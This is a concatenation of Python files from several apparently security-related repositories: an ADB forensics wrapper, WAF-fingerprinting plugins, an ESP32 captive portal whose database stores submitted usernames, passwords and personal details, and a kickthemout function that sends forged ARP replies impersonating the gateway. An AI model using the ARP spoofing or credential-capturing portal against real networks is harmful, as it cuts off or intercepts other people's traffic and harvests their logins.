} |
#### File: andriller/andriller/adb_conn.py
```python
import re
import sys
import shlex
import os.path
import logging
import subprocess
if sys.platform == 'win32':
from .utils import placebo as timeout
else:
from timeout_decorator import timeout
from .config import CODEPATH # noqa
logger = logging.getLogger(__name__)
startupinfo = None
class ADBConn:
UNIX = ['linux', 'linux2', 'darwin']
MODES = {
'download': 'download',
'bootloader': 'bootloader',
'recovery': 'recovery',
'sideload': 'sideload',
'sideload-auto-reboot': 'sideload-auto-reboot',
}
def __init__(self, logger=logger, log_level=logging.INFO):
self.adb_bin = None
self.platform = sys.platform
self.rmr = b'\r\n'
self.setup(log_level)
def setup(self, log_level):
self.logger = logger
self.logger.setLevel(log_level)
self.logger.debug(f'Platform: {self.platform}')
if self.platform in self.UNIX:
self.adb_bin = self.cmd_shell('which adb') or None
self.logger.debug(f'Using adb binary `{self.adb_bin}`')
else:
self.adb_bin = os.path.join(CODEPATH, 'bin', 'adb.exe')
self._win_startupinfo()
if not self.adb_bin or not os.path.exists(self.adb_bin):
self.logger.warning('ADB binary is not found!')
raise ADBConnError('ADB binary is not found!')
def _win_startupinfo(self):
global startupinfo
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
self.rmr = b'\r\r\n'
@property
def run_opt(self):
opt = {'shell': False, 'startupinfo': startupinfo}
if tuple(sys.version_info) >= (3, 7):
opt['capture_output'] = True
else:
opt['stdout'] = subprocess.PIPE
return opt
@timeout(60 * 60 * 2, use_signals=False)
def adb(self, cmd, binary=False, su=False, **kwargs):
if isinstance(cmd, str):
cmd = shlex.split(cmd)
if su:
cmd.insert(1, 'su -c')
self.logger.debug(f'ADB: {cmd}')
run = subprocess.run([self.adb_bin] + cmd, **self.run_opt)
if run.stdout and run.returncode == 0:
if binary:
return self.unstrip(run.stdout)
return run.stdout.decode().strip()
def adb_iter(self, cmd):
process = subprocess.Popen(
[self.adb_bin] + shlex.split(cmd),
shell=False,
startupinfo=startupinfo,
stdout=subprocess.PIPE)
while True:
output = process.stdout.readline()
if output == b'' and process.poll() is not None:
break
if output:
yield output.decode().rstrip()
rc = process.poll()
return rc
def device(self):
dev = self.adb('devices', timeout=5)
if dev:
dev = dev.split('\n')
if len(dev) > 1:
dev = dev[1].split('\t')
return dev
else:
self.logger.error('ADB binary cannot be used to check for connected devices!')
return [None, None]
def start(self):
self.adb('start-server', timeout=10)
def kill(self):
self.adb('kill-server', timeout=5)
@staticmethod
def _file_regex(fp):
return re.compile(f"^{fp.replace('*', '(.+?)')}$")
def exists(self, file_path, **kwargs):
file_path_strict = self.strict_name(file_path)
file_remote = self.adb(f'shell ls {file_path_strict}', **kwargs)
if re.match(self._file_regex(file_path), file_remote):
return file_remote
def get_file(self, file_path, **kwargs):
file_path_strict = self.strict_name(file_path)
data = self.adb(f'shell cat {file_path_strict}', binary=True, **kwargs)
return data
def pull_file(self, file_path, dst_path, **kwargs):
file_path_strict = re.sub(' ', r'\ ', file_path)
dst_path_strict = re.sub(' ', r'\ ', dst_path)
self.adb(f"pull {file_path_strict} {dst_path_strict}")
def get_size(self, file_path, **kwargs):
file_path_strict = self.strict_name(file_path)
size = self.adb(f'shell stat -c %s {file_path_strict}', **kwargs)
if not size.isdigit():
size = self.adb(f'shell ls -nl {file_path_strict}', **kwargs).split()[3]
if not size.isdigit():
size = self.adb(f'shell wc -c < {file_path_strict}', **kwargs)
if not size.isdigit():
self.logger.debug(f'Size Error: {size}')
return -1
return int(size)
@timeout(30, use_signals=False)
def cmd_shell(self, cmd, code=False, **kwargs):
self.logger.debug(f'CMD: {cmd}')
run = subprocess.run(shlex.split(cmd), **self.run_opt)
if code:
return run.returncode
else:
if run.stdout:
return run.stdout.decode().strip()
def unstrip(self, data: bytes):
return re.sub(self.rmr, b'\n', data)
def reboot(self, mode=None):
mode = self.MODES.get(mode, '')
self.logger.info(f'Rebooting in {mode}.')
self.adb(f"reboot {mode}", timeout=20)
def __call__(self, cmd, *args, **kwargs):
return self.adb(cmd, *args, **kwargs)
@staticmethod
def strict_name(file_path):
file_name = os.path.split(file_path)[1]
if ' ' in file_name:
return file_path.replace(file_name, repr(file_name).replace(' ', r'\ '))
return file_path
class ADBConnError(Exception):
pass
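# --- Illustrative usage sketch (appended here; not part of upstream andriller) ---
# Assumes the adb binary is installed and a device is attached; otherwise the
# constructor raises ADBConnError and the calls below return None.
# adb = ADBConn()
# serial, state = adb.device()                        # e.g. ('0123456789ABCDEF', 'device')
# release = adb('shell getprop ro.build.version.release')
# blob = adb.get_file('/sdcard/some file.txt')        # spaces handled via strict_name()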
```
#### File: andriller/tests/test_config.py
```python
import os
import time
import shutil
import pytest
import tempfile
from andriller import config
from andriller import __version__
@pytest.fixture
def c():
os.environ['HOME'] = tempfile.mkdtemp()
yield config.Config()
shutil.rmtree(os.environ['HOME'])
def test_config_funcs(c):
assert c.NS == 'DEFAULT'
n = int(time.time())
x = c.hex_time_now()
assert type(x) == str and len(x) == 8
assert c.time_from_hex(x) in range(n, n + 1)
@pytest.mark.parametrize('key,current,new', [
('version', __version__, '9.9.9'),
('update_rate', '100000', '2000000'),
('theme', '', 'clam'),
])
def test_update_records(c, key, current, new):
assert c(key) == current
c.update_conf(**{c.NS: {key: new}})
assert c(key) == new
``` |
{
"source": "84KaliPleXon3/bni-api",
"score": 2
} |
#### File: 84KaliPleXon3/bni-api/setup.py
```python
import setuptools
import re
with open('README.md', 'r') as fh:
long_description = fh.read()
def get_version():
with open('bni_api/__init__.py') as f:
v = re.findall(r'__version__ = \'(.+?)\'', f.read())[0]
return v
setuptools.setup(
name="bni_api",
version=get_version(),
author="loncat",
author_email="<EMAIL>",
description=
"A Python wrapper for some of BNI's internet banking functionalities.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/p4kl0nc4t/bni_api",
packages=setuptools.find_packages(),
install_requires=['requests', 'requests_html'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: MIT License",
"Operating System :: OS Independent",
],
)
``` |
{
"source": "84KaliPleXon3/ColdCore",
"score": 2
} |
#### File: ColdCore/routes/scoreboard.py
```python
from flask import Blueprint, render_template
from utils import cache
import data
import config
scoreboard = Blueprint("scoreboard", __name__, template_folder="../templates/scoreboard")
@scoreboard.route('/scoreboard/')
def index():
scoreboard_data = cache.get_complex("scoreboard")
graph_data = cache.get_complex("graph")
if scoreboard_data is None or graph_data is None:
if config.immediate_scoreboard:
scoreboard_data = scoreboard.calculate_scores()
graph_data = scoreboard.calculate_graph(data)
cache.set_complex("scoreboard", scoreboard_data, 120)
cache.set_complex("graph", graph_data, 120)
else:
return "CTF hasn't started!"
return render_template("scoreboard.html", data=scoreboard_data, graphdata=graph_data)
``` |
{
"source": "84KaliPleXon3/Devil-s-Call",
"score": 2
} |
#### File: 84KaliPleXon3/Devil-s-Call/banner.py
```python
RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, YELLOW2, GREEN2 = '\033[1;91m', '\033[46m', '\033[1;36m', '\033[1;32m', '\033[3;0m' , '\033[1;33m' , '\033[1;93m', '\033[1;92m'
def banner():
kill='''
{5}██████{0}╗ {5}███████{0}╗{5}██{0}╗ {5}██{0}╗{5}██{0}╗{5}██{0}╗ {5}█{0}╗ {5}███████{0}╗ {5}██████{0}╗ {5}█████{0}╗ {5}██{0}╗ {5}██{0}╗
{5}██{0}╔══{5}██{0}╗{5}██{0}╔════╝{5}██{0}║ {5}██{0}║{5}██{0}║{5}██{0}║ {0}╚╝ {5}██{0}╔════╝ {5}██{0}╔════╝{5}██{0}╔══{5}██{0}╗{5}██{0}║ {5}██{0}║
{5}██{0}║ {5}██{0}║{5}█████{0}╗ {5}██{0}║ {5}██{0}║{5}██{0}║{5}██{0}║ {5}███████{0}╗ {5}██{0}║ {5}███████{0}║{5}██{0}║ {5}██{0}║
{5}██{0}║ {5}██{0}║{5}██{0}╔══╝ ╚{5}██{0}╗ {5}██╔{0}╝{5}██{0}║{5}██{0}║ ╚════{5}██{0}║ {5}██{0}║ {5}██{0}╔══{5}██{0}║{5}██{0}║ {5}██{0}║
{5}██████{0}╔╝{5}███████{0}╗ ╚{5}████{0}╔╝ {5}██{0}║{5}███████{0}╗ {5}███████{0}║ ╚{5}██████{0}╗{5}██{0}║ {5}██{0}║{5}███████{0}╗{5}███████{0}╗
╚═════╝ ╚══════╝ ╚═══╝ ╚═╝╚══════╝ ╚══════╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚══════╝
'''.format(RED, WHITE, CYAN, GREEN, DEFAULT ,YELLOW)
print("\t\t\t{2}U R GOING TO MAKE A{4}".format(RED, WHITE, CYAN, GREEN, DEFAULT ,YELLOW))
print(kill)
``` |
{
"source": "84KaliPleXon3/EnableSecurity-wafw00f",
"score": 2
} |
#### File: wafw00f/plugins/f5bigipasm.py
```python
NAME = 'BIG-IP AppSec Manager (F5 Networks)'
def is_waf(self):
schemes = [
self.matchContent('the requested url was rejected'),
self.matchContent('please consult with your administrator')
]
if all(i for i in schemes):
return True
return False
```
#### File: wafw00f/plugins/f5bigipltm.py
```python
NAME = 'BIG-IP Local Traffic Manager (F5 Networks)'
def is_waf(self):
schemes = [
self.matchCookie('^bigipserver'),
self.matchHeader(('X-Cnection', 'close'), attack=True)
]
if any(i for i in schemes):
return True
return False
```
#### File: wafw00f/plugins/imunify360.py
```python
NAME = 'Imunify360 (CloudLinux)'
def is_waf(self):
schemes = [
self.matchHeader(('Server', r'imunify360.{0,10}?')),
self.matchContent(r'protected.by.{0,10}?imunify360'),
self.matchContent(r'powered.by.{0,10}?imunify360'),
self.matchContent(r'imunify360.preloader')
]
if any(i for i in schemes):
return True
return False
```
#### File: wafw00f/plugins/radware.py
```python
NAME = 'AppWall (Radware)'
def is_waf(self):
schema1 = [
self.matchContent(r'CloudWebSec\.radware\.com'),
self.matchHeader(('X-SL-CompState', '.+'))
]
schema2 = [
self.matchContent(r'because we have detected unauthorized activity'),
self.matchContent(r'<title>Unauthorized Request Blocked'),
self.matchContent(r'if you believe that there has been some mistake'),
self.matchContent(r'\?Subject=Security Page.{0,10}?Case Number')
]
if any(i for i in schema1):
return True
if all(i for i in schema2):
return True
return False
```
#### File: wafw00f/plugins/secureiis.py
```python
NAME = 'eEye SecureIIS (BeyondTrust)'
def is_waf(self):
schemes = [
self.matchContent(r'SecureIIS is an internet security application'),
self.matchContent(r'Download SecureIIS Personal Edition'),
self.matchContent(r'https?://www\.eeye\.com/Secure\-?IIS')
]
if any(i for i in schemes):
return True
return False
```
#### File: wafw00f/plugins/sitelock.py
```python
NAME = 'Sitelock (TrueShield)'
# Well this is confusing, Sitelock itself uses Incapsula from Imperva
# So the fingerprints obtained on blockpage are similar to those of Incapsula.
def is_waf(self):
schemes = [
self.matchContent(r"SiteLock will remember you"),
self.matchContent(r"Sitelock is leader in Business Website Security Services"),
self.matchContent(r"sitelock[_\-]shield([_\-]logo|[\-_]badge)?"),
self.matchContent(r'SiteLock incident ID')
]
if any(i for i in schemes):
return True
return False
```
#### File: wafw00f/plugins/viettel.py
```python
NAME = 'Viettel (Cloudrity)'
def is_waf(self):
schemes = [
self.matchContent(r"Access Denied.{0,10}?Viettel WAF"),
self.matchContent(r"cloudrity\.com\.(vn)?/"),
self.matchContent(r"Viettel WAF System")
]
if any(i for i in schemes):
return True
return False
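# --- Illustrative note (appended here; not part of upstream wafw00f) ---
# Each plugin above only defines is_waf(); the surrounding wafw00f engine calls it
# with an object that supplies matchContent/matchHeader/matchCookie. Standalone,
# the matching idea reduces to case-insensitive regex checks over the response body:
import re
_sample_body = 'Access Denied ... Viettel WAF System'  # placeholder response text
_detected = any(re.search(p, _sample_body, re.I) for p in (r"Access Denied.{0,10}?Viettel WAF", r"Viettel WAF System"))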
``` |
{
"source": "84KaliPleXon3/esp32-uPyPortal",
"score": 2
} |
#### File: esp32-uPyPortal/captive_portal/__main__.py
```python
from .app import app
from . import views
from .dns import DNSServer
import gc
def main(**params):
gc.collect()
import logging
logging.basicConfig(level=logging.INFO)
# Preload templates to avoid memory fragmentation issues
gc.collect()
app._load_template('homepage.html')
app._load_template('admin.html')
app._load_template('login.html')
gc.collect()
import micropython
micropython.mem_info()
gc.collect()
# starting dns server
dns_server = DNSServer(**params)
dns_server.start()
gc.collect()
# webserver
app.run(debug=True, **params)
if __name__ == '__main__':
main()
```
#### File: esp32-uPyPortal/captive_portal/models_filedb.py
```python
from ucollections import OrderedDict
import filedb as uorm
db = uorm.DB("login-db")
class LoginData(uorm.Model):
__db__ = db
__table__ = "login"
__schema__ = OrderedDict([
("timestamp", ("TIMESTAMP", uorm.now)),
("archived", ("INT", 0)),
("username", ("TEXT", "")),
("password", ("TEXT", "")),
("email", ("TEXT", "")),
("street", ("TEXT", "")),
("city", ("TEXT", "")),
("postcode", ("TEXT", "")),
("country", ("TEXT", "")),
("mobile", ("TEXT", "")),
("content", ("TEXT", "")),
])
@classmethod
def mapkeys(cls, obj):
return [obj.get(k) for k in cls.__schema__.keys()]
@classmethod
def public(cls):
res = [x for x in cls.scan() if x.archived == 0]
res.sort(key=lambda x: x.timestamp, reverse=True)
return res
```
#### File: 84KaliPleXon3/esp32-uPyPortal/setup_sta_upip.py
```python
import network
import gc
ssid_ = 'FRITZBoxLeMa'
wp2_pass = '<PASSWORD>'
sta_if = []
def do_connect():
global sta_if
sta_if = network.WLAN(network.STA_IF)
if not sta_if.isconnected():
print('connecting to network...')
sta_if.active(True)
sta_if.connect(ssid_, wp2_pass)
while not sta_if.isconnected():
pass
print('network config:', sta_if.ifconfig())
# connecting to WiFi
do_connect()
gc.collect()
# installing dependencies
# import upip
# upip.install('picoweb')
# gc.collect()
# upip.install('micropython-logging')
# gc.collect()
# upip.install('utemplate')
# gc.collect()
# upip.install('micropython-pkg_resources')
# gc.collect()
# upip.install('micropython-btreedb')
# gc.collect()
### ftp server for loading files
from ftp import ftpserver
ftp_server = ftpserver()
ftp_server.start_thread()
import captive_portal.__main__
captive_portal.__main__.main(host=sta_if.ifconfig()[0], port=80)
``` |
{
"source": "84KaliPleXon3/IoT-Implant-Toolkit",
"score": 3
} |
#### File: core/basic/__init__.py
```python
import sys
import argparse
#from os import geteuid
class Plugin:
def __init__(self, **kwargs):
self.name = kwargs["name"]
self.usage = kwargs["usage"]
self.classname = kwargs["classname"]
self.description = kwargs["description"]
self.author = kwargs["author"]
self.ref = kwargs["ref"]
self.category = kwargs["category"]
self.needroot = kwargs.get("needroot", False)
self.argparser = argparse.ArgumentParser(prog=self.name, description=self.description)
self.args = None
def execute(self):
pass
def intro(self):
print("{:<15} {}".format("Plugin:", self.name))
#print("{:<15} {}".format("Author:", self.author))
print("{:<15} {}".format("Description:", self.description))
print("{:<15} {}".format("Reference:", self.ref))
print("{:<15} {}".format("Category:", self.category))
print("{:<15} {}".format("Usage:", self.usage))
print()
def run(self, arglist):
self.args = self.argparser.parse_args(arglist)
self.intro()
self.execute()
```
#### File: plugins/firmware/mksquashfs.py
```python
import os
from toolkit.core.basic import Plugin
class MkSquashfs(Plugin):
'''
inherit from class Plugin
'''
def __init__(self):
super().__init__(name = "mksquashfs",
description = "pack&unpack for squashfs filesystem",
classname = "MkSquashfs",
author = "Plougher",
ref = "https://github.com/plougher/squashfs-tools",
category = "Firmware Pack&Unpack",
usage = 'Run "run mksquashfs" will compress outputs/squashfs-root/ to new.squashfs .Run "run mksquashfs help" to see more parameters.')
self.argparser.add_argument("--input", default="./outputs/squashfs-root/", help="squashfs dir")
self.argparser.add_argument("--output", default="./outputs/new.squashfs", help="new squashfs file")
self.argparser.add_argument("--comp", default="xz", help="compress method")
def execute(self):
#print("Run mksquashfs with parameter {}".format(str(self.args)))
os.system("mksquashfs {} {} -comp {} -noappend -always-use-fragments".format(self.args.input, self.args.output, self.args.comp))
``` |
{
"source": "84KaliPleXon3/kickthemout",
"score": 2
} |
#### File: 84KaliPleXon3/kickthemout/spoof.py
```python
import sys, logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import (
get_if_hwaddr,
getmacbyip,
ARP,
Ether,
sendp,
conf,
RadioTap,
Dot11,
Dot11Deauth
)
# send malicious ARP packets
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp.pdst = target_ip
arp.hwdst = target_mac
ether.dst = target_mac
arp.op = 2
def broadcastPacket():
packet = ether / arp
sendp(x=packet, verbose=False)
broadcastPacket()
``` |
{
"source": "84KaliPleXon3/kismon",
"score": 2
} |
#### File: kismon/kismon/tracks.py
```python
import time
import json
import os
import collections
class Tracks:
def __init__(self, tracks_file):
self.tracks = {}
self.tracks_file = tracks_file
self.starttime = int(time.time())
def load(self):
if not os.path.isfile(self.tracks_file):
return
with open(self.tracks_file, 'r') as f:
self.tracks = json.load(f)
def save(self):
new_file = "%s.new" % self.tracks_file
with open(new_file, 'w') as f:
json.dump(self.tracks, f)
os.rename(new_file, self.tracks_file)
def add_point_to_track(self, track_name, lat, lon, alt):
if track_name not in self.tracks:
self.tracks[track_name] = {}
timestamp = int(time.time())
self.tracks[track_name][str(timestamp)] = (lat, lon, alt)
def group_to_sessions(self, filter_time):
sessions = {}
timeout = 600
for track_name in self.tracks:
sessions[track_name] = collections.OrderedDict()
track = self.tracks[track_name]
timestamps = list(track.keys())
timestamps.sort()
first_timestamp = 0
previous_timestamp = 0
session = collections.OrderedDict()
for timestamp in timestamps:
point = track[timestamp]
timestamp = int(timestamp)
if timestamp < filter_time:
continue
if timestamp - previous_timestamp > timeout:
if len(session) > 0:
sessions[track_name][first_timestamp] = session
session = collections.OrderedDict()
first_timestamp = timestamp
session[timestamp] = point
previous_timestamp = timestamp
if len(session) > 0:
sessions[track_name][first_timestamp] = session
return sessions
def export_kml(self, export_filter):
if export_filter == 'current':
filter_time = self.starttime
else:
filter_time = 0
output = ["<Folder><name>Tracks</name>"]
sessions = self.group_to_sessions(filter_time)
time_format = "%a %b %d %H:%M:%S %Y"
for track_name in sessions:
output.append("<Folder><name>%s</name>" % track_name)
for session_start in sessions[track_name]:
output.append(
"<Placemark><Style><LineStyle><color>7f00ff00</color><width>3</width></LineStyle></Style><LineString><coordinates>\n")
for timestamp in sessions[track_name][session_start]:
lat, lon, alt = sessions[track_name][session_start][timestamp]
output.append("%s,%s \n" % (lon, lat))
output.append("</coordinates></LineString>")
output.append("<name>Session %s - %s</name></Placemark>\n" % (
time.strftime(time_format, time.gmtime(session_start)),
time.strftime(time_format, time.gmtime(timestamp)),
))
output.append("</Folder>")
output.append("</Folder>")
return "".join(output)
```
#### File: kismon/widgets/networklist.py
```python
from gi.repository import Gtk
from gi.repository import Gdk
from gi.repository import GObject
from gi.repository import GLib
import kismon.utils as utils
class NetworkList:
def __init__(self, networks, locate_network_on_map, on_signal_graph, config):
self.network_lines = {}
self.network_iter = {}
self.network_selected = None
self.locate_network_on_map = locate_network_on_map
self.on_signal_graph = on_signal_graph
self.networks = networks
self.config = config
self.value_cache = {}
for key in ('time', 'crypt', 'server', 'type', 'channel', 'signal', 'ssid'):
self.value_cache[key] = {}
self.networks.notify_add_list["network_list"] = self.add_network
self.networks.notify_remove_list["network_list"] = self.remove_network
self.networks.disable_refresh_functions.append(self.pause)
self.networks.resume_refresh_functions.append(self.resume)
self.treeview = Gtk.TreeView()
num = 0
self.enabled_columns = {}
self.columns = ("BSSID", "Type", "SSID", "Ch", "Crypt",
"First Seen", "Last Seen", "Latitude", "Longitude",
"Signal dbm", "Comment", "Servers")
self.available_columns = {}
if len(self.config['network_list_columns']) == 0:
self.config['network_list_columns'] = list(self.columns)
for column in self.columns:
renderer = Gtk.CellRendererText()
if column == "Comment":
renderer.set_property('editable', True)
renderer.connect("editing-started", self.on_comment_editing_started)
elif column == "Signal dbm":
renderer = Gtk.CellRendererProgress()
tvcolumn = Gtk.TreeViewColumn(column, renderer, text=num)
self.available_columns[column] = tvcolumn
cell = Gtk.CellRendererText()
tvcolumn.pack_start(cell, True)
tvcolumn.set_sort_column_id(num)
tvcolumn.set_clickable(True)
tvcolumn.set_resizable(True)
tvcolumn.set_reorderable(True)
if column == "Signal dbm":
tvcolumn.add_attribute(renderer, "value", 12)
num += 1
self.treeview.insert_column(tvcolumn, 0) # the button only gets created when the column is inserted
tvcolumbutton = tvcolumn.get_button()
tvcolumbutton.connect('button-press-event', self.on_column_clicked, num)
self.treeview.remove_column(tvcolumn) # the columns get added again in the right order
# read the column list from the config to preserve their order
for column in self.config['network_list_columns']:
self.add_column(column)
self.treeview.connect("button-press-event", self.on_treeview_clicked) # has to be done after TreeViewColumn's
self.treeview.connect("columns-changed", self.on_columns_changed)
self.treeview.show()
self.store = Gtk.ListStore(
GObject.TYPE_STRING, # mac
GObject.TYPE_STRING, # type
GObject.TYPE_STRING, # ssid
GObject.TYPE_INT, # channel
GObject.TYPE_STRING, # cryptset
GObject.TYPE_STRING, # firsttime
GObject.TYPE_STRING, # lasttime
GObject.TYPE_FLOAT, # lat
GObject.TYPE_FLOAT, # lon
GObject.TYPE_INT, # signal dbm
GObject.TYPE_STRING, # comment
GObject.TYPE_STRING, # servers
GObject.TYPE_INT, # signal dbm + 100 (progressbar)
)
self.treeview.set_model(self.store)
scrolled = Gtk.ScrolledWindow()
scrolled.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
scrolled.add(self.treeview)
frame = Gtk.Frame()
frame.set_label("Networks")
frame.add(scrolled)
self.scrolled_window = scrolled
self.widget = frame
self.store.set_sort_column_id(6, Gtk.SortType.DESCENDING)
network_popup = Gtk.Menu()
locate_item = Gtk.MenuItem.new_with_label('Copy field')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_copy_field)
locate_item = Gtk.MenuItem.new_with_label('Copy network')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_copy_network)
locate_item = Gtk.MenuItem.new_with_label('Locate on map')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_locate_marker)
signal_item = Gtk.MenuItem.new_with_label('Signal graph')
network_popup.append(signal_item)
signal_item.connect("activate", self.on_signal_graph)
network_popup.show_all()
self.network_popup = network_popup
self.clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)
self.treeview_click_event = None
def add_column(self, column):
if column not in self.config["network_list_columns"]:
# Position the column next to its original neighbor column as defined in self.columns.
# If that column is not enabled, go further to the left.
x = 1
while True:
left_column_position = self.columns.index(column) - x
if self.columns[left_column_position] in self.config["network_list_columns"]:
break
if left_column_position < 0:
break
x += 1
column_position = left_column_position + 1
self.config["network_list_columns"].insert(column_position, column)
else:
column_position = self.config["network_list_columns"].index(column)
self.treeview.insert_column(self.available_columns[column], column_position)
self.enabled_columns[column] = self.available_columns[column]
def remove_column(self, column):
self.treeview.remove_column(self.enabled_columns[column])
del self.enabled_columns[column]
self.config["network_list_columns"].remove(column)
def on_column_clicked(self, widget, event, num=None):
self.treeview_click_event = event
if event.button == 1: # left click
self.treeview.set_search_column(num)
elif event.button == 3: # right click
self.open_column_popup(event)
def on_columns_changed(self, widget):
columns = self.treeview.get_columns()
if len(columns) != len(self.enabled_columns):
# when the widget gets destroyed, the event is triggered after each column was removed
return
new_list = []
for column in columns:
new_list.append(column.get_title())
self.config["network_list_columns"] = new_list
def open_column_popup(self, event):
column_popup = Gtk.Menu()
for column in self.available_columns:
item = Gtk.CheckMenuItem.new_with_label(column)
column_popup.append(item)
if column in self.enabled_columns:
item.activate()
item.connect("activate", self.on_column_activated, column)
column_popup.show_all()
column_popup.popup_at_pointer(event)
def on_column_activated(self, widget, column):
active = widget.get_active()
if active:
self.add_column(column)
else:
self.remove_column(column)
def on_comment_editing_started(self, widget, editable, path):
editable.connect("editing-done", self.on_comment_editing_done)
def on_comment_editing_done(self, widget):
network = self.networks.get_network(self.network_selected)
network['comment'] = widget.get_text()
self.add_network(self.network_selected)
def prepare_network_servers(self, value):
if len(value) == 0 or value is None:
servers = None
else:
servers = []
for server in value:
if server.endswith(':2501'): # remove the default port
server = server.rsplit(':', 1)[0]
servers.append(server)
servers_str = ", ".join(sorted(servers))
try:
servers = self.value_cache['server'][servers_str]
except KeyError:
servers = GObject.Value(GObject.TYPE_STRING, servers_str)
self.value_cache['server'][servers_str] = servers
return servers
def prepare_network_time(self, value):
try:
result = self.value_cache['time'][value]
except KeyError:
result = GObject.Value(GObject.TYPE_STRING, utils.format_timestamp(value))
self.value_cache['time'][value] = result
return result
def prepare_network_crypt(self, value):
try:
crypt = self.value_cache['crypt'][value]
except KeyError:
crypt = GObject.Value(GObject.TYPE_STRING, value)
self.value_cache['crypt'][value] = crypt
return crypt
def prepare_network_channel(self, value):
try:
channel = self.value_cache['channel'][value]
except KeyError:
channel = GObject.Value(GObject.TYPE_INT, value)
self.value_cache['channel'][value] = channel
return channel
def prepare_network_type(self, value):
try:
network_type = self.value_cache['type'][value]
except KeyError:
network_type = GObject.Value(GObject.TYPE_STRING, value)
self.value_cache['type'][value] = network_type
return network_type
def prepare_network_signal(self, value):
try:
return self.value_cache['signal'][value]
except KeyError:
pass
""" Wifi cards report different ranges for the signal, some use
-1xx to 0 and others 0 to 100. The CellRendererProgress needs a
percentage value between 0 and 100, so we convert the value if
necessary.
"""
if -100 <= value <= 0:
signal_strength = value + 100
elif value < -100:
signal_strength = 0
elif 1 <= value <= 100:
signal_strength = value
else:
signal_strength = 0
signal = GObject.Value(GObject.TYPE_INT, value)
signal_strength = GObject.Value(GObject.TYPE_INT, signal_strength)
self.value_cache['signal'][value] = (signal, signal_strength)
return signal, signal_strength
def prepare_network_ssid(self, value):
if value == "":
ssid_str = "<no ssid>"
else:
ssid_str = value
try:
ssid = self.value_cache['ssid'][ssid_str]
except KeyError:
ssid = GObject.Value(GObject.TYPE_STRING, ssid_str)
self.value_cache['ssid'][ssid_str] = ssid
return ssid
@staticmethod
def prepare_network_coordinate(value):
if value == 0.0:
return None
else:
return value
def add_network(self, mac):
network = self.networks.get_network(mac)
""" The Gtk.ListStore will convert every Python-type value to its
GObject equivalent. Most of the prepare_network_* functions cache
and return the value as a GObject, this speed things up as we have
a lot of duplicate values. Furthermore a None value is faster then
an zero size string, so we replace it where possible.
"""
if "signal_dbm" not in network or len(network["signal_dbm"]) != 3:
signal = 0
else:
signal = network["signal_dbm"]["last"]
signal, signal_strength = self.prepare_network_signal(signal)
if network['comment'] == '':
comment = None
else:
comment = network['comment']
line = [mac,
self.prepare_network_type(network["type"]),
self.prepare_network_ssid(network["ssid"]),
self.prepare_network_channel(network["channel"]),
self.prepare_network_crypt(network["crypt"]),
self.prepare_network_time(network["firsttime"]),
self.prepare_network_time(network["lasttime"]),
self.prepare_network_coordinate(network["lat"]),
self.prepare_network_coordinate(network["lon"]),
signal,
comment,
self.prepare_network_servers(network["servers"]),
signal_strength
]
try:
old_line = self.network_lines[mac]
except KeyError:
old_line = None
self.network_lines[mac] = line
if mac in self.network_iter:
network_iter = self.network_iter[mac]
num = 0
for value in line:
if old_line is not None and old_line.pop(0) == value:
num += 1
continue
self.store.set_value(network_iter, num, value)
num += 1
else:
self.network_iter[mac] = self.store.append(line)
# stick to the top of the table after adding a new row
adj = self.scrolled_window.get_vadjustment()
self.scroll_value = int(adj.get_value())
if self.scroll_value == 0:
GLib.idle_add(self.treeview.scroll_to_point, -1, 0)
def remove_network(self, mac):
try:
network_iter = self.network_iter[mac]
except KeyError:
return
self.store.remove(network_iter)
del (self.network_iter[mac])
def pause(self):
self.treeview.freeze_child_notify()
self.treeview.set_model(None)
def resume(self):
self.treeview.set_model(self.store)
self.treeview.thaw_child_notify()
def on_treeview_clicked(self, treeview, event):
if self.treeview_click_event == event:
return
x = int(event.x)
y = int(event.y)
pthinfo = treeview.get_path_at_pos(x, y)
if pthinfo is None:
return
path, col, cellx, celly = pthinfo
treeview.grab_focus()
treeview.set_cursor(path, col, 0)
network_iter = self.store.get_iter(path)
mac = self.store.get_value(network_iter, 0)
self.network_selected = mac
self.column_selected = self.columns.index(col.get_title())
if event.type == Gdk.EventType.DOUBLE_BUTTON_PRESS: # double click
self.on_locate_marker(None)
elif event.button == 3: # right click
self.network_popup.popup(None, None, None, 0, event.button, event.time, )
def on_locate_marker(self, widget):
if self.locate_network_on_map is not None:
self.locate_network_on_map(self.network_selected)
def on_copy_field(self, widget):
selected_text = self.get_value_from_cell(self.network_selected, self.column_selected)
self.set_clipboard(selected_text)
def on_copy_network(self, widget):
text = []
num = 0
for column in self.available_columns:
value = self.get_value_from_cell(self.network_selected, num)
text.append("%s: %s" % (column, value))
num += 1
self.set_clipboard('\n'.join(text))
def set_clipboard(self, text):
self.clipboard.set_text("%s" % text, -1)
self.clipboard.store()
def get_value_from_cell(self, mac, column):
value = self.network_lines[mac][column]
try:
value = value.get_value()
except AttributeError:
pass
return value
```
#### File: kismon/windows/channel.py
```python
from gi.repository import Gtk
class ChannelWindow:
def __init__(self, sources, client_thread, parent):
self.sources = sources
self.client_thread = client_thread
self.changes = {}
self.widgets = {}
self.gtkwin = Gtk.Window()
self.gtkwin.set_transient_for(parent)
self.gtkwin.set_position(Gtk.WindowPosition.CENTER)
self.gtkwin.set_default_size(320, 240)
self.gtkwin.set_title("Configure Channel")
self.vbox = None
self.sources_list = None
self.init_box()
def init_box(self):
vbox = Gtk.VBox()
vbox.set_property('margin', 5)
self.sources_list = Gtk.VBox()
sources_list_scroll = Gtk.ScrolledWindow()
sources_list_scroll.add(self.sources_list)
sources_list_scroll.get_children()[0].set_shadow_type(Gtk.ShadowType.NONE)
sources_list_scroll.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
vbox.pack_start(sources_list_scroll, True, True, 0)
for uuid in self.sources:
self.widgets[uuid] = {}
